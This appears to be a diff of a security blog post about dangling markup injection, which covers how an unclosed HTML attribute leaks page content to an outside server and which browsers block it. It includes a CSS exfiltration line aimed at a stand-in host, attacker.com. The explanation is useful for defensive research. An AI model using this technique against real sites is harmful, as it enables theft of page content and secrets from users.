Universal WAF Bypass for finding and exploiting SQL injections

 (more…)

-Bypassing Browsers' Mitigations Against Markup Dangling Injection
+Bypassing Browsers' Defenses Against Dangling Markup Injections

 Dangling markup injection attacks are very simple.
 Imagine a web page that has an HTML injection vulnerability like the following example:

 An HTML tag with an unclosed attribute is injected into the page.
 The unclosed attribute consumes the web page's content until it finds a matching closing quote.
-Such attribute can then leak the consumed data through a HTTP request:

-In this example a <meta> tag was used to request a stylesheet from a foreign server which is logging incoming requests and waiting for the leaked data to arrive.
+In this example a <link> tag was used to request a stylesheet from a foreign server which is logging incoming requests and waiting for the leaked data to arrive.
 But any HTML tag that performs an HTTP request will do, such as <img> or <iframe>.
 And really HTML is not the only option, CSS code could be used too in a scenario where style injection is feasible.
-CSS functionality such as background: url('http://attacker.com/?log= or @import could be used to force the browser to initiate an HTTP request.
+CSS functionality such as background-image: url('http://attacker.com/?log= or @import could be used to force the browser to initiate an HTTP request.

 Actually there's a github site named HTTPLeaks that lists all possible ways in which a browser can leak data through HTTP requests.

-However things have changed through time and now most browsers implement defenses in an attempt to stop these types of attack; whenever an URL is rendered, the parser looks for certain dangerous patterns such as angle brackets < > and new lines (\n \r).
-If this combination of characters is found, then the request is blocked by the browser.
+However things have changed through time and now most browsers implement defenses in an attempt to stop these types of attack; whenever an URL is rendered, the parser looks for certain dangerous patterns such as angle brackets < > and new lines (%0A %0D).
+If this combination of characters is found, then the request is blocked by the browser because it seems as if the document is being leaked through the URL.
 It is possible to see the blocked request in the dev-tools network panel:

 I tested different dangling injections in different browsers.
 Chrome, Chromium, Edge and Opera are indeed blocking the exfiltrating request.
 However for some reason Firefox (v.
 124) is not implementing such defense.